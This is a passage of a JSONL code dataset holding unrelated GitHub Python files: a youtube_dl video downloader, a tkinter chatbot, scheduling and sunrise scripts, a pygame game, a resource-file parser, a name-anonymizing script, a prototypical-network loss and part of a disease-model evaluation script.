DOWNLOAD\n #--------------------------------------------------------------------\n def __load_list(self, fileName):\n ''' Load the .txt file with video URL to download '''\n\n import numpy as np\n import os.path\n if os.path.isfile(fileName):\n return np.genfromtxt(fileName,dtype='str')\n else:\n print (sysColor.Red + 'File ' + fileName + ' does not exists.' + sysColor.White)\n #--------------------------------------------------------------------\n\n #--------------------------------------------------------------------\n # ELIMINATE FROM STRING THE INVISIBLE CHARACTERS\n #--------------------------------------------------------------------\n def __filter_nonprintable(self, text):\n import string\n # Get the difference of all ASCII characters from the set of printable characters\n nonprintable = set([chr(i) for i in range(128)]).difference(string.printable)\n # Use translate to remove all non-printable characters\n return text.translate({ord(character):None for character in nonprintable})\n #--------------------------------------------------------------------\n\n #---------------------------------------------------------------------\n # CHECK IF A VIDEO URL REALLY EXISTS\n # https://docs.python.org/3.1/howto/urllib2.html\n #---------------------------------------------------------------------\n def __isOnlineVideoValid(self, url):\n '''Checks if a video exists in the internet'''\n\n msg = ''\n isValid = False\n req = urllib.request.Request(url)\n try:\n response = urllib.request.urlopen(req)\n response.read() #page = \n isValid = True\n except urllib.error.URLError as e: \n if hasattr(e, 'reason'):\n msg = 'Failed to reach server:', e.reason\n elif hasattr(e, 'code'): \n code = self.__getErrorCode(e)\n msg = 'Error code: ' + str(e) + ' ' + code\n\n self.errorList.append(url + ',' + self.__filter_nonprintable(str(msg) ) )\n print (sysColor.Red + \"INVALID VIDEO: \" + str(e) + sysColor.White + ' ' + str(url) + '\\n')\n\n return isValid\n #--------------------------------------------------------------------\n\n #--------------------------------------------------------------------\n # GET THE ERROR CODE INTERACTIONG WITH THE responses DICTIONARY\n # how to iteract with dictionaries: \n # https://stackoverflow.com/questions/7409078/iterating-over-dictionary-key-values-corresponding-to-list-in-python\n #--------------------------------------------------------------------\n def __getErrorCode(self, e):\n ''' Get the url connection error description from the error code '''\n from responseCodes import responses\n try:\n return responses[e][1]\n except:\n return 'Unknown Error'\n #--------------------------------------------------------------------\n\n #--------------------------------------------------------------------\n # PUBLIC METHOD TO GENERATE THE DOWNLOAD REPORTS\n #--------------------------------------------------------------------\n def saveCSVReports (self):\n if len(self.errorList) > 0:\n self.__saveReport(self.errorList, 'error_Rprt')\n\n if len(self.vidInfoList) > 1: #because of the header\n llist = []\n for any in self.vidInfoList:\n llist.append('Video Name,Video Codec,Audio Codec,URL')\n llist.append(any.getCodedInfo())\n\n self.__saveReport(llist, 'vidInfo_Rprt')\n #--------------------------------------------------------------------\n\n #--------------------------------------------------------------------\n # GENERIC CSV WRITER TO SAVE LISTS OF MESSAGES\n #--------------------------------------------------------------------\n def __saveReport (self, llist, fileName):\n ''' Saves a list of text objects in a csv file.\n The file output has the date-time of the creation. '''\n\n import datetime\n now = datetime.datetime.now()\n date_time = now.strftime(\"%Y-%m-%d_%H:%M:%S\") # https://www.programiz.com/python-programming/datetime/strftime\n\n import os\n dir = './reports/'\n if not os.path.exists(dir):\n os.makedirs(dir)\n\n text_file = open(dir + fileName + '_' + date_time + '_.csv', \"w+\")\n for any in llist:\n text_file.write( any + '\\n')\n text_file.close()\n #--------------------------------------------------------------------\n\n #--------------------------------------------------------------------\n def getVideoList(self):\n ''' Return the list of videos with generated names to be used for the next step (inception)'''\n return self.vidOK # Return by value, no reference\n #--------------------------------------------------------------------\n\n #--------------------------------------------------------------------\n # TEST VIDEO DOWNLOAD \n #-------------------------------------------------------------------- \n def __isVideoDownloadedOK (self, vidName, url):\n ''' Check if the file downloaded is a valid video '''\n import os\n from pathlib import Path\n print (sysColor.Blue + 'TEST VIDEO: ' + sysColor.White + url)\n video= Path(self.videoFolder + '/' + vidName+ '.mp4') # video was downloaded successfully\n if video.is_file():\n print (sysColor.Green + 'VALID VIDEO: ' + sysColor.White + url + '\\n')\n self.vidOK.append(vidName)\n else: # check possible errors\n import glob\n if glob.glob(self.videoFolder + '/' + vidName+ '.*'): # check if the file was saved with an invalid extension\n print (sysColor.Red + \"INVALID VIDEO: Missing codecs to convert to .mp4 \" + sysColor.White + str(url) + '\\n')\n for any in glob.glob(self.videoFolder + '/' + vidName + '.*'):\n os.remove(any) \n self.errorList.append (url + ',' + 'ERROR: Missing codecs to convert to .mp4')\n else:\n print (sysColor.Red + \"INVALID VIDEO: Names do not match. \" + sysColor.White + str(url) + '\\n')\n #--------------------------------------------------------------------\n\n #--------------------------------------------------------------------\n # DOWNLOAD SINGLE VIDEOS\n #--------------------------------------------------------------------\n def __downloadVideo (self, url):\n ''' Downsload a single video from the URL received as parameter. ''' \n\n print (sysColor.Yellow + 'DOWNLOAD ATTEMPT: ' + sysColor.White + url)\n uniqueName = self.__generateUniqueName()\n\n if (self.__isOnlineVideoValid(url)): # 0. Tests if URL is valid\n \n with youtube_dl.YoutubeDL(self.__getDLConfiguration(uniqueName)) as ydl:\n try:\n\n # 1. get video info: https://stackoverflow.com/questions/23727943/how-to-get-information-from-youtube-dl-in-python\n info = ydl.extract_info(url, download=False) # Retrieves a dictionary of video information\n vid = self.VideoInfo(info, url, uniqueName)\n self.vidInfoList.append(vid)\n\n # 2. Download video\n ydl.download([url]) \n\n # 3. test if video was downloaded correctly\n self.__isVideoDownloadedOK(vid.getVideoName(), url)\n\n except youtube_dl.DownloadError as e:\n msg = self.__filter_nonprintable(str(e))\n self.errorList.append (url + ',ERROR: ' + msg)\n print (sysColor.Red + \"INVALID VIDEO: \" + str(e) + sysColor.White + str(url) + '\\n')\n #--------------------------------------------------------------------\n\n #--------------------------------------------------------------------\n # DOWNLOAD VIDEOS - MAIN FUNCTION \n #--------------------------------------------------------------------\n def download (self, url = None):\n ''' Download video, receive as parameter a video url.\\n\n If passed without parameter it will download the video list '''\n if (url != None):\n self.__downloadVideo(url)\n else: # download list of videos\n if len(self.files) > 0:\n # for each url in url list \n for url in self.files:\n self.__downloadVideo(url)\n else:\n print (sysColor.Red + 'Video list ' + self.fileName + ' has no videos.' + sysColor.White)\n\n #--------------------------------------------------------------------\n\n #--------------------------------------------------------------------\n # RETURNS A DICTIONARY WITH THE VALID VIDEO URL, TITLE AND UNIQUE NAME\n #--------------------------------------------------------------------\n def getVideoDataDict (self):\n ''' Returns a dictionary with video name, title and url '''\n dicList = []\n for any in self.vidOK:\n for vid in self.vidInfoList:\n if (any == str(vid.vid_uname ) ):\n ldict = dict (name=vid.vid_uname, url=vid.vid_url, title=vid.vid_title) # create a local dict to hold the data\n dicList.append(ldict)\n\n return dicList\n #---------------------------------------------------------------------\n \n\n#=========================================================================================\n# END OF CLASS VIDEODOWNLOADER\n#=========================================================================================\n","repo_name":"Cadesh/Python_Attic","sub_path":"YouTubeDL_complete/videoDL.py","file_name":"videoDL.py","file_ext":"py","file_size_in_byte":16991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8074174222","text":"import tkinter as tk\nimport os\nos.environ['PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION'] = 'python'\nfrom bot import Bot\nfrom tkinter import Entry, Label, Button, Text, END \n\ndef main():\n def on_send_click():\n input_text = input_box.get()\n response = bot.respond(input_text)\n chat_history.insert(END, \"You: \" + input_text + '\\n')\n chat_history.insert(END, \"Bot: \" + response + '\\n')\n\n bot = Bot(\"guilty_gear_data.db\")\n\n root = tk.Tk()\n root.title(\"Dustloop Chatbot\")\n\n chat_history = Text(root, wrap = tk.WORD)\n chat_history.pack(padx=10, pady=10)\n\n input_box = Entry(root, width=50)\n input_box.pack(padx=20, pady=10)\n\n send_button = Button(root, text=\"Send\", command=on_send_click)\n send_button.pack(padx=10, pady=10)\n\n root.mainloop()\n bot.close()\n\nif __name__ == \"__main__\":\n main()","repo_name":"Jackshouka/NLP_Portfolio","sub_path":"chatbot/driver_bot.py","file_name":"driver_bot.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18836654334","text":"import datetime\nimport time\n\nget_now = datetime.datetime.now()\nprint(\"now\", get_now)\nfrom scheduler import Scheduler\nimport scheduler.trigger as trigger\n\n# def foo():\n# print(\"foo\")\n\n\n# schedule = Scheduler()\n\n# schedule.cyclic(datetime.timedelta(seconds=10), foo)\n# schedule.minutely(datetime.time(second=10), foo)\n# schedule.daily(datetime.time(second=10), foo)\n# schedule.exec_jobs()\n\n# print(schedule)\n#\n# while True:\n# schedule.exec_jobs()\n# time.sleep(1)\n\nimport sched\nfrom datetime import date, datetime, timedelta\nfrom suntime import Sun, SunTimeException\n\nnow = datetime.now()\nform = now.strftime(\"%Y-%m-%d %I:%M\")\nprint(\"For\", form)\nprint(\"Forms\", now)\nprint(\"time\", time.time())\nrun_at = now + timedelta(seconds=3)\ndelay = (run_at - now).total_seconds()\n\nprint(delay)\nprint(run_at)\n\ns = sched.scheduler(time.time, time.sleep)\nprint(s)\n\nsun_rise_time = None\nsun_set_time = None\n\n\ndef light_on():\n pass\n\n\ndef light_off():\n pass\n\n\ndef do_something(sec):\n # do your stuff\n\n current_latitude1 = 30.1979793\n current_longitude1 = 71.4724978\n\n print(\"Latitude = \", current_latitude1)\n print(\"Longitude = \", current_longitude1)\n\n get_sun_time = Sun(current_latitude1, current_longitude1)\n\n today_date = datetime.today()\n print(\"today\", today_date)\n global sun_rise_time\n global sun_set_time\n\n sun_rise_time = get_sun_time.get_local_sunrise_time(today_date)\n sun_set_time = get_sun_time.get_local_sunset_time(today_date)\n forms = sun_set_time.strftime(\"%Y-%m-%d %H:%M\")\n\n t = sun_set_time.timestamp()\n print(\"t\", t)\n print(\"Sun\", sun_rise_time)\n print(\"Formsss\", forms)\n print(\"Formsss\", sun_set_time)\n\n print('On {} the sun at Multan raised at {} and get down at {}.'.\n format(today_date, sun_rise_time.strftime('%H:%M'), sun_set_time.strftime('%H:%M')))\n s.enter(delay, 1, do_something, (sec,))\n\n\ns.enter(delay, 1, do_something, (s,))\ns.run()\n","repo_name":"rehmanjameel/python_arconn_test","sub_path":"trigger_fun.py","file_name":"trigger_fun.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12420068282","text":"import pygame\nimport random\n\n# Inițializăm Pygame\npygame.init()\n\n# Definim culorile\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nBLUE = (0, 0, 255)\n\n# Setăm dimensiunile ecranului jocului\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 600\n\n# Setăm titlul jocului\npygame.display.set_caption(\"Farsky-like game\")\n\n# Cream ecranul jocului\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n\n# Definim variabilele de stare ale jucătorului\nplayer_x = SCREEN_WIDTH // 2\nplayer_y = SCREEN_HEIGHT // 2\nplayer_speed = 5\nplayer_size = 25\n\n# Definim variabilele pentru resurse\nresource_size = 20\nresource_count = 25\nresources = []\nfor i in range(resource_count):\n resource_x = random.randint(0, SCREEN_WIDTH - resource_size)\n resource_y = random.randint(0, SCREEN_HEIGHT - resource_size)\n resources.append(pygame.Rect(resource_x, resource_y, resource_size, resource_size))\n\n# Definim variabilele pentru construcții\nbuildings = []\n\n# Bucla principala a jocului\nrunning = True\nwhile running:\n # Citim toate evenimentele generate de jucător\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n # Citim tastele apăsate de jucător\n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT]:\n player_x -= player_speed\n if keys[pygame.K_RIGHT]:\n player_x += player_speed\n if keys[pygame.K_UP]:\n player_y -= player_speed\n if keys[pygame.K_DOWN]:\n player_y += player_speed\n\n # Verificăm dacă jucătorul a ieșit din ecran\n if player_x < 0:\n player_x = 0\n elif player_x > SCREEN_WIDTH - player_size:\n player_x = SCREEN_WIDTH - player_size\n if player_y < 0:\n player_y = 0\n elif player_y > SCREEN_HEIGHT - player_size:\n player_y = SCREEN_HEIGHT - player_size\n\n # Verificăm dacă jucătorul a colectat o resursă\n for resource in resources:\n if pygame.Rect(player_x, player_y, player_size, player_size).colliderect(resource):\n resources.remove(resource)\n # Adăugăm o construcție\n building_x = random.randint(0, SCREEN_WIDTH - player_size)\n building_y = random.randint(0, SCREEN_HEIGHT - player_size)\n buildings.append(pygame.Rect(building_x, building_y, player_size, player_size))\n\n # Ștergem ecranul și redesenăm jucătorul și resursele\n screen.fill(BLACK)\n pygame.draw.rect(screen, WHITE, [player_x, player_y, player_size, player_size])\n for resource in resources:\n pygame.draw.rect(screen, BLUE, resource)\n\n # Redesenăm construcțiile\n for building in buildings:\n pygame.draw.rect(screen, WHITE, building)\n\n # Actualizăm ecranul\n pygame.display.update()\n\n# Oprim\n","repo_name":"FisHFisHGG/GG","sub_path":".py","file_name":".py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7098890369","text":"import re\n\n\n\nresource =\"C:\\\\Users\\\\kristhim\\\\Desktop\\\\thimma 01302017\\\\programming\\\\python\\\\csur modules\\\\computeNodeResourceFile\"\n\ntry:\n with open(resource) as f:\n res = f.read().splitlines()\nexcept IOError as err:\n errors = True\n #print(\"Unable to open the \"+ resource + \"for reading.\\n\" + str(err))\n\n\nfirmwareList = []\nfirmwareDict = {}\ncomponentUpdateDict = {'Firmware' : {}, 'Drivers' : {}, 'Software' : {}}\nnicCardModels = []\nupdateDriverList = []\nstarted = False\n# for data in res:\n# #Remove spaces if any are present.\n# data = data.replace(' ', '')\n# if not re.match('Firmware.*', data) and not started:\n# continue\n#\n# elif re.match('Firmware.*', data):\n# started = True\n# continue\n# elif re.match(r'\\s*$', data):\n# break\n# else:\n# firmwareList = data.split('|')\n# #print(firmwareList)\n# firmwareDict[firmwareList[0]] = [firmwareList[1], firmwareList[2]]\n#\n# count = 0\n# for key, value in firmwareDict.items():\n# #print(\"Key :\" + str(key) + \"value :\" + str(value))\n# #print(\"\\n\")\n# count = count + 1\n# #print(count)\n#\n# #print(firmwareList)\n# #print(firmwareDict)\n\n#-----------------------------------------------------------------------------\n# started = False\n# driversFound = False\n# updateDriverList = []\n# mlnxCount = 0\n# csurDriverList = []\n#\n# for data in res:\n# data = data.replace(' ','')\n# #print(data)\n# if not 'Drivers' in data and not driversFound:\n# continue\n# elif 'Drivers' in data:\n# driversFound = True\n# continue\n# elif not (('SLES11.4' in data) and ('DL580Gen9' in data )) and not started:\n# continue\n# elif (('SLES11.4' in data ) and ('DL580Gen9' in data)):\n# started = True\n# continue\n# elif re.match(r'\\s*$', data):\n# break\n# else:\n# csurDriverList = data.split('|')\n# #print(csurDriverList)\n# csurDriver = csurDriverList[0]\n# #print(csurDriver)\n# csurDriverVersion = csurDriverList[1]\n# #print(csurDriverVersion)\n# #print(csurDriverList[2])\n\n\n#--------------------------------------------------------------------------------\n\nstarted = False\nsoftwareFound = False\nupdateSoftwareList = []\n#csurSoftwareList = []\n\nfor data in res:\n data = data.replace(' ','')\n #print(data)\n if not 'Software' in data and not softwareFound:\n continue\n elif 'Software' in data:\n softwareFound = True\n continue\n elif not (('SLES11.4' in data) and ('DL580Gen9' in data )) and not started:\n continue\n elif (('SLES11.4' in data ) and ('DL580Gen9' in data)):\n started = True\n continue\n elif re.match(r'\\s*$', data):\n break\n else:\n csurSoftwareList = data.split('|')\n csurSoftware = csurSoftwareList[0]\n csurSoftwareEpoch = csurSoftwareList[1]\n csurSoftwareVersion = csurSoftwareList[2]\n csurSoftwareRpm = csurSoftwareList[3]\n print(csurSoftwareRpm)\n\n#-----------------------------------------------------------------------------------------------\ncomponentHeader = 'Component'\ncomponentUnderLine = '---------'\ncsurVersionHeader = 'CSUR Version'\ncsurVersionUnderLine = '------------'\ncurrentVersionHeader = 'Current Version'\ncurrentVersionUnderLine = '---------------'\nstatusHeader = 'Status'\nstatusUnderLine = '------'\n# print('{0:40}'.format('Firmware Versions:') + '\\n')\n# print('{0:40} {1:25} {2:25} {3}'.format(componentHeader, csurVersionHeader, currentVersionHeader, statusHeader))\n# print('{0:25}'.format(componentHeader,csurVersionHeader))\n\n# command =\"Smart Array P431 in Slot 2 (sn: PCZED0ARH8L03C) \\n\" \\\n# \"Smart Array P830i in Slot 0 (sn: 0014380292CE340)\"\n#\n# #print(command)\n#\n# controllerList = re.findall('P\\d{3}i*\\s+in\\s+Slot\\s+\\d{1}',command)\n#\n# for control in controllerList:\n# print(control)\n# controlModel = control.split()[0]\n# controllerSlot = control.split()[-1]\n# #print(controlModel+\" \"+controllerSlot)\n# csurControllerFirmwareVersion = firmwareDict[controlModel][0]\n# csurControllerFirmwareRpm = firmwareDict[controlModel][1]\n# #print(csurControllerFirmwareVersion+\" \"+csurControllerFirmwareRpm)\n# #print(controllerSlot)\n# #print(controlModel[0]+\"and the slot value is \"+controlModel[3])\n#\n# componentUpdateDict['Firmware'][controlModel] = firmwareDict[controlModel][1]\n# print(componentUpdateDict['Firmware'][controlModel])\n# csurEnclosureFirmwareVersion27 = firmwareDict['D2700'][1]\n# csurEnclosureFirmwareVersion37 = firmwareDict['D3700'][1]\n# print(csurEnclosureFirmwareVersion27)\n# print(csurEnclosureFirmwareVersion37)\n#\n","repo_name":"publiccoding/demorepo","sub_path":"Python/Advanced/dataLoadDict.py","file_name":"dataLoadDict.py","file_ext":"py","file_size_in_byte":4704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"41927070948","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport random\n\nveriler = pd.read_csv('/home/kontrpars/Desktop/eren/Python/Python-Machine-Learning/csvexamplefolder/Ads_CTR_Optimisation.csv')\n\nN = 10000\nd = 10\ntoplam = 0\nsecilenler = []\nfor n in range(0,N):\n ad = random.randrange(d)\n secilenler.append(ad)\n odul = veriler.values[n,ad] # Verilerdeki n. satır =1 ise ödül 1\n toplam = toplam + odul\n\n print(toplam)\n\nplt.hist(secilenler)\nplt.show()\n\n\n\n\n# print(veriler)","repo_name":"ahmeterenozkaya/PythonMachineLearning","sub_path":"UpperConfidenceBound/randomselection.py","file_name":"randomselection.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17939238049","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 25 08:58:52 2023\n\nProgram that takes a plain text file and filters out names, replacing them\nwith \n\n@author: matthew\n\"\"\"\n\nimport sys\nimport string\n\npunctuation = list(string.punctuation)\n\n# %% Open the file\ntry:\n with open(sys.argv[1]) as f:\n name_list = [line.rstrip().title() for line in f.readlines()]\n with open(sys.argv[2]) as f:\n contents_list = f.readlines()\nexcept (FileNotFoundError, IndexError) as e:\n if isinstance(e, FileNotFoundError):\n print(\"File not found, double check the name and try again.\")\n elif isinstance(e, IndexError):\n print(\"Please include a file name.\")\n sys.exit()\n\n# %% Compare each word to the name list and change to if matched.\n\nanonymized_list = []\n\nfor line in contents_list:\n new_line = []\n for word in line.split(\" \"):\n word_stripped = word.strip()\n if (len(word_stripped) > 1 and word_stripped[-1] in punctuation):\n word_trimmed = word_stripped[:-1]\n if word_trimmed in name_list:\n new_line.append(f\"{word_stripped[-1]}\")\n else:\n new_line.append(word)\n elif word_stripped in name_list:\n new_line.append(\"\")\n elif (len(word_stripped) > 2 and word_stripped[-2] == \"'\"):\n if word_stripped[:-2] in name_list:\n new_line.append(\"'s\")\n else:\n new_line.append(word)\n anonymized_list.append(\" \".join(new_line))\n\n\n# %% Write the output file\n\nwith open(\"anonymized.txt\", \"w\") as f:\n f.write(''.join(anonymized_list))\n","repo_name":"marnoldris/python","sub_path":"name_filter.py","file_name":"name_filter.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"4878206743","text":"import torch\nfrom torch import Tensor, nn\nfrom torch.nn import functional as F\n\n\ndef conv_block(in_channels, out_channels):\n \"\"\"\n returns a block conv-bn-relu-pool\n \"\"\"\n return nn.Sequential(\n nn.Conv2d(in_channels, out_channels, kernel_size=3, padding=1),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(),\n nn.MaxPool2d(2),\n )\n\n\nclass ProtoNet(nn.Module):\n \"\"\"\n Consists of 4 conv blocks and 1 fully connected layer\n \"\"\"\n\n def __init__(\n self,\n # img_size: tuple = (96, 96),\n input_chan: int = 3,\n hidden_chan: int = 64,\n conv_output_chan: int = 64,\n # output_dim: int = 576,\n ):\n super(ProtoNet, self).__init__()\n self.encoder = nn.Sequential(\n conv_block(input_chan, hidden_chan), # -> (B, 64, H/2, W/2)\n conv_block(hidden_chan, hidden_chan), # -> (B, 64, H/4, W/4)\n conv_block(hidden_chan, hidden_chan), # -> (B, 64, H/8, W/8)\n conv_block(\n hidden_chan, conv_output_chan\n ), # -> (B, 32, H/16, W/16)\n )\n # h = img_size[0]\n # w = img_size[1]\n # flat_dim = z_dim * h // 16 * w // 16\n # self.fc = nn.Linear(flat_dim, output_dim)\n\n def forward(self, x):\n # print(x.size()) # x: (B, 3, H, W)\n x = self.encoder(x) # -> (B, 64, H/16, W/16)\n x = x.view(x.size(0), -1) # -> (B, z_dim * H/16 * W/16)\n # x = self.fc(x) # -> (B, output_dim)\n return x\n\n\nclass PrototypicalLoss(nn.Module):\n \"\"\"\n Loss class deriving from Module for the prototypical loss function defined\n below\n \"\"\"\n\n def __init__(self, n_support):\n super(PrototypicalLoss, self).__init__()\n self.n_support = n_support\n\n def forward(self, input, target):\n return prototypical_loss(input, target, self.n_support)\n\n\ndef euclidean_dist(x: Tensor, y: Tensor) -> Tensor:\n \"\"\"\n Compute euclidean distance between two tensors\n\n Params:\n - x: Tensor of shape (n, d), n is the number of samples, d is the feature.\n - y: Tensor of shape (c, d), representation vectors of prototypes.\n \"\"\"\n n = x.size(0) # 300\n c = y.size(0) # 60\n d = x.size(1) # 576\n assert d == y.size(1)\n\n x = x.unsqueeze(1).expand(n, c, d)\n y = y.unsqueeze(0).expand(n, c, d)\n return torch.pow(x - y, 2).sum(2)\n\n\ndef prototypical_loss(hidden: Tensor, labels: Tensor, num_support: int):\n \"\"\"\n Inspired by https://github.com/jakesnell/prototypical-networks/blob/master/protonets/models/few_shot.py\n\n Compute the barycentres by averaging the features of n_support\n samples for each class in target, computes then the distances from each\n samples' features to each one of the barycentres, computes the\n log_probability for each n_query samples for each one of the current\n classes, of appartaining to a class c, loss and accuracy are then computed\n and returned\n\n Params:\n - hidden: the model output for a batch of samples\n - labels: ground truth for the above batch of samples\n - n_support: number of samples to keep in account when computing\n barycentres, for each one of the current classes\n \"\"\" # noqa\n labels = labels.to(\"cpu\") # (B)\n hidden = hidden.to(\"cpu\") # (B, C)\n\n # FIXME when torch.unique will be available on cuda too\n # 返回有哪些 class(returns the unique elements of the input tensor)\n classes = torch.unique(labels)\n n_classes = len(classes)\n\n # FIXME when torch will support where as np\n # assuming n_query, n_target constants\n\n # Occurrence of class[0] in labels - n_support\n n_query = labels.eq(classes[0].item()).sum().item() - num_support\n\n # 每一个 class 的 n_query + n_support 数目都是一样的,\n # 所以取第一个 class 来算就行了,\n # 在这个 episode 里面取到的总样本数减去 n_support 就是 n_query\n support_idxs = [\n labels.eq(c).nonzero()[:num_support].squeeze(1) for c in classes\n ]\n # 对于每一个 class(label),\n # .eq 判断 target 的每一位是否是这个 label,\n # .nonzero: return indices of all nonzero elements\n # [:n_support] 从里面取出 n_support 作为支撑集,\n # squeeze 将其从 (n_support, 1) 压缩为 n_support 的 tensor\n\n prototypes = torch.stack(\n [hidden[idx_list].mean(0) for idx_list in support_idxs]\n ) # 计算每一个label的c_k(representation)\n\n # FIXME when torch will support where as np\n # query_idxs = torch.stack(\n # list(map(lambda c: target_cpu.eq(c).nonzero()[n_support:], classes))\n # )\n query_idxs = torch.stack(\n [labels.eq(c).nonzero()[num_support:] for c in classes]\n )\n\n query_idxs = query_idxs.view(-1)\n\n # 获取查询集的对应编号,但是最后那个view(-1)啥意思啊\n\n query_samples = hidden.to(\"cpu\")[query_idxs]\n # 是按class的顺序排的\n\n # (n_query*n_classes)*n_classes\n dists = euclidean_dist(query_samples, prototypes)\n\n # n_classes*n_query*n_classes\n log_p_y = F.log_softmax(-dists, dim=1).view(n_classes, n_query, -1)\n\n target_inds = torch.arange(0, n_classes) # 从0~n_classes-1的tensor\n # n_classes*1*1,内容从0~n_classes-1\n target_inds = target_inds.view(n_classes, 1, 1)\n # n_claasses*n_query*1,从0~n_classes-1每个都有n_query个\n target_inds = target_inds.expand(n_classes, n_query, 1).long()\n\n loss_val = -log_p_y.gather(2, target_inds).squeeze().view(-1).mean()\n # torch.max(Tensor,dim)返回两个值,第一个为储存着最大值的Tensor,第二维为储存着最大值对应的index的Tensor\n _, y_hat = log_p_y.max(2)\n # y_hat:n_classes*n_query\n # target_inds:n_classes*n_query*1\n acc_val = y_hat.eq(target_inds.squeeze()).float().mean()\n\n return loss_val, acc_val\n","repo_name":"donny-chan/chujian-classifier","sub_path":"modeling/protonet.py","file_name":"protonet.py","file_ext":"py","file_size_in_byte":5846,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"174147183","text":"def DiseaseModel_Evaluation(scriptInputs):\r\n '''\r\n DiseaseModel_Evaluation performs model inference and figure generation for disease classification\r\n Parameters and relevant files are provided in the accompanying yaml file (disease_info.yml)\r\n \r\n Copyright (C) 2021, Rajaram Lab - UTSouthwestern \r\n \r\n This file is part of anc-2021-dl-wm-tauopathy.\r\n \r\n anc-2021-dl-wm-tauopathy is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n \r\n anc-2021-dl-wm-tauopathy is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n \r\n You should have received a copy of the GNU General Public License\r\n along with anc-2021-dl-wm-tauopathy. If not, see .\r\n \r\n Anthony Vega, 2021\r\n '''\r\n import os as os\r\n os.environ['CUDA_VISIBLE_DEVICES']='0'\r\n import MILCore as mil\r\n import PatchGen as pg\r\n import numpy as np\r\n import pickle\r\n import matplotlib.pyplot as plt\r\n from sklearn.metrics import confusion_matrix\r\n from tensorflow.keras.models import load_model\r\n import itertools\r\n import seaborn as sns\r\n\r\n def plot_confusion_matrix(cm, classes,\r\n normalize=False,\r\n title='Confusion matrix',\r\n cmap=plt.cm.Blues):\r\n \"\"\"\r\n This function prints and plots the confusion matrix.\r\n Normalization can be applied by setting `normalize=True`.\r\n \"\"\"\r\n if normalize:\r\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\r\n\r\n \r\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\r\n plt.title(title,fontsize=32)\r\n tick_marks = np.arange(len(classes))\r\n plt.xticks(tick_marks, classes, rotation=45,fontsize=32)\r\n plt.yticks(tick_marks, classes,fontsize=32)\r\n plt.ylim((-0.5,len(classes)-0.5))\r\n \r\n fmt = '.2f' if normalize else '0.2f'\r\n thresh = cm.max() / 2.\r\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\r\n plt.text(j, i, format(cm[i, j], fmt),\r\n horizontalalignment=\"center\",\r\n color=\"white\" if cm[i, j] > thresh else \"black\",fontsize=32)\r\n \r\n plt.tight_layout()\r\n plt.ylabel('True label',fontsize=32)\r\n plt.xlabel('Predicted label',fontsize=32)\r\n \r\n def plot_avg_confusion_matrix(cm_raw, classes,\r\n normalize=False,\r\n title='Confusion matrix',\r\n cmap=plt.cm.Blues):\r\n \"\"\"\r\n This function prints and plots the average confusion matrix.\r\n Normalization can be applied by setting `normalize=True`.\r\n \"\"\"\r\n cm = np.mean(cm_raw,axis=2)\r\n cm_s = np.std(cm_raw,axis=2)\r\n if normalize:\r\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\r\n cm_s = cm_s.astype('float') / cm.sum(axis=1)[:, np.newaxis]\r\n\r\n \r\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\r\n plt.title(title,fontsize=32)\r\n tick_marks = np.arange(len(classes))\r\n plt.xticks(tick_marks, classes, rotation=45,fontsize=32)\r\n plt.yticks(tick_marks, classes,fontsize=32)\r\n plt.ylim((-0.5,len(classes)-0.5))\r\n \r\n fmt = '.2f' if normalize else '0.2f'\r\n thresh = cm.max() / 2.\r\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\r\n plt.text(j, i, format(cm[i, j], fmt),\r\n horizontalalignment=\"center\",\r\n color=\"white\" if cm[i, j] > thresh else \"black\",fontsize=32)\r\n plt.text(j, i-0.2, '+/- ' +format(cm_s[i, j], fmt),\r\n horizontalalignment=\"center\",verticalalignment=\"baseline\",\r\n color=\"white\" if cm[i, j] > thresh else \"black\",fontsize=32)\r\n \r\n plt.tight_layout()\r\n plt.ylabel('True label',fontsize=32)\r\n plt.xlabel('Predicted label',fontsize=32)\r\n \r\n def save_dict(new_dict,name,pFolder):\r\n #First check that secondary_dict is in fact and dictionary\r\n if type(new_dict) is dict:\r\n print('Dictionary found')\r\n with open(pFolder+ name + '.pkl', 'wb') as f:\r\n pickle.dump(new_dict, f, pickle.HIGHEST_PROTOCOL)\r\n \r\n else:\r\n print('No dictionary found! Saving Failed')\r\n \r\n \r\n \r\n def load_dict(name ,pFolder):\r\n with open(pFolder + name + '.pkl', 'rb') as f:\r\n return pickle.load(f)\r\n # %% Section to read yaml info\r\n #Relevant 